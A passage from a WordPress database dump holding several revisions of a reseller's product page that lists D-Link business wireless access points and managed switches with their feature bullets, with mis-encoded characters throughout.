wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:33:51','2019-09-25 06:33:51','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3398,1,'2019-09-25 14:30:11','2019-09-25 06:30:11','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:30:11','2019-09-25 06:30:11','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3399,1,'2019-09-25 14:30:45','2019-09-25 06:30:45','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; 